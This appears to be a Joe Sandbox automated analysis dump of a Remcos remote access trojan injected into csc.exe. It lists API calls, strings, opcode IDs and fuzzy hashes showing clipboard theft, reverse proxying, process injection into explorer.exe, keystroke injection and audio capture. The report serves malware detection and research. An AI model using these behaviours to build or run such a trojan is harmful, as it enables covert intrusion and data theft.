                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00416984
                                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                      • String ID: !D@
                                                                                                                                                                                      • API String ID: 2172192267-604454484
                                                                                                                                                                                      • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                                                                                                                                                                      • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                                                                                                                                      • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                                                                                                                                                                      • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00413465
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 297527592-0
                                                                                                                                                                                      • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                                                                                                                                                                      • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 00448135
                                                                                                                                                                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                                      • _free.LIBCMT ref: 00448141
                                                                                                                                                                                      • _free.LIBCMT ref: 0044814C
                                                                                                                                                                                      • _free.LIBCMT ref: 00448157
                                                                                                                                                                                      • _free.LIBCMT ref: 00448162
                                                                                                                                                                                      • _free.LIBCMT ref: 0044816D
                                                                                                                                                                                      • _free.LIBCMT ref: 00448178
                                                                                                                                                                                      • _free.LIBCMT ref: 00448183
                                                                                                                                                                                      • _free.LIBCMT ref: 0044818E
                                                                                                                                                                                      • _free.LIBCMT ref: 0044819C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                                                                                      • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                                                                                      • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Eventinet_ntoa
                                                                                                                                                                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                                                                      • API String ID: 3578746661-3604713145
                                                                                                                                                                                      • Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                                                                                                                                                                                      • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                                                                                                                                      • Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                                                                                                                                                      • __fassign.LIBCMT ref: 0044B479
                                                                                                                                                                                      • __fassign.LIBCMT ref: 0044B494
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                                                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 1324828854-263838557
                                                                                                                                                                                      • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                                                                                                                      • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                                                                                                                                      • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                                                                                                                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00417521
                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                      • API String ID: 1462127192-2001430897
                                                                                                                                                                                      • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                                                                                                                                                                      • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe), ref: 0040749E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                                      • API String ID: 2050909247-4242073005
                                                                                                                                                                                      • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                                                                                                                                                                      • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                                                                                                                                      • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                                                                                                                                                        • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                                                                                                                                                        • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                                                                                                                                                        • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                                                                                                                                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                                                                                                                                                      • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                                                                                                                                                      • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0041D4E9
                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                      • String ID: Remcos
                                                                                                                                                                                      • API String ID: 1970332568-165870891
                                                                                                                                                                                      • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                                                                                      • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                                                                                                                                                      • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                                                                                                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                                                                                                                                      • _free.LIBCMT ref: 00445494
                                                                                                                                                                                      • _free.LIBCMT ref: 004454AD
                                                                                                                                                                                      • _free.LIBCMT ref: 004454DF
                                                                                                                                                                                      • _free.LIBCMT ref: 004454E8
                                                                                                                                                                                      • _free.LIBCMT ref: 004454F4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                      • String ID: C
                                                                                                                                                                                      • API String ID: 1679612858-1037565863
                                                                                                                                                                                      • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                                                                                                                                                                      • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                                                                                                                                                                      • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: tcp$udp
                                                                                                                                                                                      • API String ID: 0-3725065008
                                                                                                                                                                                      • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                                                                                      • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                                                                                                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                      • String ID: PkG$XMG$NG$NG
                                                                                                                                                                                      • API String ID: 1649129571-3151166067
                                                                                                                                                                                      • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                                                                                                                                                                      • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                                                                                                                                      • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                                                                                                                                        • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                                                        • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                      • String ID: .part
                                                                                                                                                                                      • API String ID: 1303771098-3499674018
                                                                                                                                                                                      • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                                                                                                                                                                      • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InputSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3431551938-0
                                                                                                                                                                                      • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                                                                                                      • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                                                                                                                                      • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                                                                                                                                      • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16_free
                                                                                                                                                                                      • String ID: a/p$am/pm$zD
                                                                                                                                                                                      • API String ID: 2936374016-2723203690
                                                                                                                                                                                      • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                                                                                                                                                                      • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Enum$InfoQueryValue
                                                                                                                                                                                      • String ID: [regsplt]$xUG$TG
                                                                                                                                                                                      • API String ID: 3554306468-1165877943
                                                                                                                                                                                      • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                                                                                                                                                                      • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                                                                                                                                      • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                                                                                                                                                                      • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                                                                                                                                                                      • __freea.LIBCMT ref: 0045121D
                                                                                                                                                                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 313313983-263838557
                                                                                                                                                                                      • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                                                                                                                                                                      • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                                                                                                                                      • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
